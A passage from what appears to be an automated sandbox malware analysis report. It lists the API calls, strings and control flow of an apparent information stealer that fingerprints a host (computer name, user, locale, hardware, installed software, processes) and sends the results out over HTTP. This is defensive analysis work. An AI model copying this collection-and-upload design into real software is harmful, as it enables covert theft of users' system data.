                                        • Part of subcall function 00300420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003004BF
                                        • Part of subcall function 00300420: RtlAllocateHeap.NTDLL(00000000), ref: 003004C6
                                      • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00313684,00000000,?,00000000,00000000,003101E9), ref: 00304728
                                        • Part of subcall function 00301090: OpenProcess.KERNEL32(00000410,00000000,?), ref: 003010A5
                                        • Part of subcall function 00301090: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003010C0
                                        • Part of subcall function 00301090: CloseHandle.KERNEL32(00000000), ref: 003010C7
                                        • Part of subcall function 003005A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003005B5
                                        • Part of subcall function 003005A0: RtlAllocateHeap.NTDLL(00000000), ref: 003005BC
                                        • Part of subcall function 00300900: CoInitializeEx.OLE32(00000000,00000000), ref: 00300928
                                        • Part of subcall function 00300900: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00300939
                                        • Part of subcall function 00300900: CoCreateInstance.COMBASE(003149C0,00000000,00000001,003148F0,?), ref: 00300953
                                        • Part of subcall function 00300900: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0030098C
                                        • Part of subcall function 00300900: VariantInit.OLEAUT32(?), ref: 003009E3
                                        • Part of subcall function 002FFB20: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFB2C
                                        • Part of subcall function 002FFB20: RtlAllocateHeap.NTDLL(00000000), ref: 002FFB33
                                        • Part of subcall function 002FFB20: GetComputerNameA.KERNEL32(00000000,?), ref: 002FFB47
                                        • Part of subcall function 002FFAE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFAEC
                                        • Part of subcall function 002FFAE0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFAF3
                                        • Part of subcall function 002FFAE0: GetUserNameA.ADVAPI32(00000000,?), ref: 002FFB07
                                        • Part of subcall function 003002C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00300300
                                        • Part of subcall function 003002C0: RtlAllocateHeap.NTDLL(00000000), ref: 00300307
                                        • Part of subcall function 003002C0: wsprintfA.USER32 ref: 00300317
                                        • Part of subcall function 002FFC30: GetKeyboardLayoutList.USER32(00000000,00000000,003101E9), ref: 002FFC4D
                                        • Part of subcall function 002FFC30: LocalAlloc.KERNEL32(00000040,00000000), ref: 002FFC5F
                                        • Part of subcall function 002FFC30: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002FFC69
                                        • Part of subcall function 002FFC30: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002FFC93
                                        • Part of subcall function 002FFC30: LocalFree.KERNEL32(00000000), ref: 002FFD16
                                        • Part of subcall function 002FFBC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFBD1
                                        • Part of subcall function 002FFBC0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFBD8
                                        • Part of subcall function 002FFBC0: GetTimeZoneInformation.KERNEL32(?), ref: 002FFBE7
                                        • Part of subcall function 002FFBC0: wsprintfA.USER32 ref: 002FFC12
                                        • Part of subcall function 002FFD30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFD45
                                        • Part of subcall function 002FFD30: RtlAllocateHeap.NTDLL(00000000), ref: 002FFD4C
                                        • Part of subcall function 002FFD30: RegOpenKeyExA.KERNEL32(80000002,02F357B8,00000000,00020119,?), ref: 002FFD6B
                                        • Part of subcall function 002FFD30: RegQueryValueExA.KERNEL32(?,02F45660,00000000,00000000,00000000,000000FF), ref: 002FFD86
                                        • Part of subcall function 002FFD30: RegCloseKey.ADVAPI32(?), ref: 002FFD90
                                        • Part of subcall function 002FFDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE02
                                        • Part of subcall function 002FFDE0: GetLastError.KERNEL32 ref: 002FFE10
                                        • Part of subcall function 002FFDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE48
                                        • Part of subcall function 002FFDE0: wsprintfA.USER32 ref: 002FFE92
                                        • Part of subcall function 002FFDA0: GetSystemInfo.KERNEL32(?), ref: 002FFDAD
                                        • Part of subcall function 002FFDA0: wsprintfA.USER32 ref: 002FFDC3
                                        • Part of subcall function 002FFED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFEDE
                                        • Part of subcall function 002FFED0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFEE5
                                        • Part of subcall function 002FFED0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 002FFF05
                                        • Part of subcall function 002FFED0: wsprintfA.USER32 ref: 002FFF2B
                                        • Part of subcall function 00300200: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003101E9), ref: 00300228
                                        • Part of subcall function 00300200: Process32First.KERNEL32(00000000,00000128), ref: 00300238
                                        • Part of subcall function 00300200: Process32Next.KERNEL32(00000000,00000128), ref: 0030024A
                                        • Part of subcall function 00300200: Process32Next.KERNEL32(00000000,00000128), ref: 0030029E
                                        • Part of subcall function 00300200: CloseHandle.KERNEL32(00000000), ref: 003002A9
                                        • Part of subcall function 002FFFC0: RegOpenKeyExA.KERNEL32(?,02F3E7E8,00000000,00020019,?,003101E9), ref: 00300009
                                        • Part of subcall function 002FFFC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00300052
                                        • Part of subcall function 002FFFC0: wsprintfA.USER32 ref: 0030007C
                                        • Part of subcall function 002FFFC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0030009A
                                        • Part of subcall function 002FFFC0: RegQueryValueExA.KERNEL32(00000000,02F45198,00000000,000F003F,?,00000400), ref: 003000CA
                                        • Part of subcall function 002FFFC0: lstrlen.KERNEL32(?), ref: 003000DF
                                        • Part of subcall function 002FFFC0: RegQueryValueExA.KERNEL32(00000000,02F45348,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00313408), ref: 00300156
                                      • lstrlen.KERNEL32(00000000,00000000,?,00313684,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00304F07
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$Allocate$wsprintf$Open$CloseInformationQueryValuelstrcpy$CreateLocalNameProcess32lstrlen$CurrentHandleInfoInitializeKeyboardLayoutListLogicalNextProcessorTimelstrcat$AllocBlanketCharComputerDirectoryEnumErrorFileFirstFreeGlobalInitInstanceLastLocaleMemoryModuleObjectProfileProxySecuritySingleSleepSnapshotStatusSystemThreadToolhelp32UserVariantVolumeWaitWindowsZonememset
                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                      • API String ID: 1720495592-1014693891
                                      • Opcode ID: 661066760e71eb0921f2ecd812e2a74e0a55fa76a54a067c4fec919248921aed
                                      • Instruction ID: 4323be8c634ef5c2a6c949ec318fd04890d0845ae3ff71736ca4b4c5f03c9a06
                                      • Opcode Fuzzy Hash: 661066760e71eb0921f2ecd812e2a74e0a55fa76a54a067c4fec919248921aed
                                      • Instruction Fuzzy Hash: EF626172C2010C6EDB49F7A0DA62DFEF3789E14780B604279E61271191EF717B59CE64
                                      Function 002F5BB0 Relevance: 44.3, APIs: 21, Strings: 4, Instructions: 584networkstringmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1795 2f5bb0-2f5c5f call 2ff850 call 2f3d70 call 2ff810 * 5 call 2ffa50 InternetOpenA StrCmpCA 1812 2f5c64-2f5c66 1795->1812 1813 2f5c61 1795->1813 1814 2f5c6c-2f5daa call 300b80 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff940 call 2ff8f0 call 2ff890 * 2 InternetConnectA 1812->1814 1815 2f6246-2f6267 InternetCloseHandle call 2ffa50 call 2f6cd0 1812->1815 1813->1812 1901 2f6243 1814->1901 1902 2f5db0-2f5de3 HttpOpenRequestA 1814->1902 1825 2f6269-2f628f call 2ff8a0 call 2ff9a0 call 2ff8f0 call 2ff890 1815->1825 1826 2f6294-2f62fa call 300ab0 * 2 call 2ff890 * 9 1815->1826 1825->1826 1901->1815 1903 2f6239-2f6240 InternetCloseHandle 1902->1903 1904 2f5de9-2f5deb 1902->1904 1903->1901 1905 2f5ded-2f5dfd InternetSetOptionA 1904->1905 1906 2f5e03-2f61d8 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2f1ed0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ffa50 lstrlen call 2ffa50 lstrlen GetProcessHeap RtlAllocateHeap call 2ffa50 lstrlen call 2ffa50 memcpy call 2ffa50 lstrlen call 2ffa50 * 2 lstrlen memcpy call 2ffa50 lstrlen call 2ffa50 HttpSendRequestA InternetReadFile 1904->1906 1905->1906 2065 2f622f-2f6236 InternetCloseHandle 1906->2065 2066 2f61da 1906->2066 2065->1903 2067 2f61e0-2f61e5 2066->2067 2067->2065 2068 2f61e7-2f622d call 2ff9a0 call 2ff8f0 call 2ff890 InternetReadFile 2067->2068 2068->2065 2068->2067
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5C3C
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F5C57
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F5D9D
                                      • HttpOpenRequestA.WININET(00000000,02F431B8,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F5DD9
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,02F34F90,00000000,?,00313358), ref: 002F611D
                                      • lstrlen.KERNEL32(00000000), ref: 002F612E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002F6139
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F6140
                                      • lstrlen.KERNEL32(00000000), ref: 002F6151
                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 002F6162
                                      • lstrlen.KERNEL32(00000000), ref: 002F6173
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F618C
                                      • memcpy.MSVCRT(00000000), ref: 002F6195
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F61A8
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002F61B9
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 002F61D0
                                      • InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 002F6225
                                      • InternetCloseHandle.WININET(00000000), ref: 002F6230
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F5DFD
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • InternetCloseHandle.WININET(00000000), ref: 002F623A
                                      • InternetCloseHandle.WININET(00000000), ref: 002F6247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocateConnectCrackOptionProcessSend
                                      • String ID: "$------$build_id$mode
                                      • API String ID: 2649202363-3829489455
                                      • Opcode ID: 54909c62508315c5f1c5befd3af8f731fbbdb6dd89638171f4717369e6398c85
                                      • Instruction ID: 4a528d6c912ba76b7bd13b3373093673df7c30365515ea815b7a76e3a4c13a08
                                      • Opcode Fuzzy Hash: 54909c62508315c5f1c5befd3af8f731fbbdb6dd89638171f4717369e6398c85
                                      • Instruction Fuzzy Hash: 6822317282010DAEDB45EBA0CD96EFEF778AF14780F544178F60262191EF706A59CF64
                                      Function 002FFFC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 180registrystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • RegOpenKeyExA.KERNEL32(?,02F3E7E8,00000000,00020019,?,003101E9), ref: 00300009
                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00300052
                                      • wsprintfA.USER32 ref: 0030007C
                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0030009A
                                      • RegQueryValueExA.KERNEL32(00000000,02F45198,00000000,000F003F,?,00000400), ref: 003000CA
                                      • lstrlen.KERNEL32(?), ref: 003000DF
                                      • RegQueryValueExA.KERNEL32(00000000,02F45348,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00313408), ref: 00300156
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 1989970852-3278919252
                                      • Opcode ID: 7e7713b99f5da6c6d08b28240881720df8e8653adbedbee69307aef14085a220
                                      • Instruction ID: 9c1c5bbf29e7189524c849e915bd49f8bc2af86fb627856cda3b1f002e98c319
                                      • Opcode Fuzzy Hash: 7e7713b99f5da6c6d08b28240881720df8e8653adbedbee69307aef14085a220
                                      • Instruction Fuzzy Hash: 5D611A7191110DABDB59DB90CC95FEEB77CEF54740F008168F605A3290EB706A4ACFA0
                                      Function 002F43E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176networkmemoryfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2251 2f43e0-2f443c call 2ff850 call 2f3d70 GetProcessHeap RtlAllocateHeap call 2ffa50 2257 2f4441-2f4462 InternetOpenA StrCmpCA 2251->2257 2258 2f4467-2f4469 2257->2258 2259 2f4464 2257->2259 2260 2f446f-2f448f InternetConnectA 2258->2260 2261 2f45aa-2f45cc InternetCloseHandle call 2ff890 * 2 2258->2261 2259->2258 2262 2f4495-2f44c6 HttpOpenRequestA 2260->2262 2263 2f45a3-2f45a4 InternetCloseHandle 2260->2263 2265 2f44cc-2f44ce 2262->2265 2266 2f4596-2f45a0 InternetCloseHandle 2262->2266 2263->2261 2268 2f44e6-2f4516 HttpSendRequestA HttpQueryInfoA 2265->2268 2269 2f44d0-2f44e0 InternetSetOptionA 2265->2269 2266->2263 2272 2f4518-2f4535 call 2ff890 * 2 2268->2272 2273 2f4536-2f454a call 300a80 2268->2273 2269->2268 2273->2272 2278 2f454c-2f454e 2273->2278 2278->2266 2280 2f4550-2f4553 2278->2280 2280->2266 2282 2f4555-2f4571 InternetReadFile 2280->2282 2282->2266 2283 2f4573-2f4590 call 300b00 2282->2283 2286 2f4592-2f4594 2283->2286 2286->2266 2286->2282
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002F441C
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F4423
                                      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F4442
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F445A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F4482
                                      • HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F44BC
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F44E0
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F44EF
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002F450E
                                      • InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 002F4566
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4597
                                      • InternetCloseHandle.WININET(00000000), ref: 002F45A4
                                      • InternetCloseHandle.WININET(00000000), ref: 002F45AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
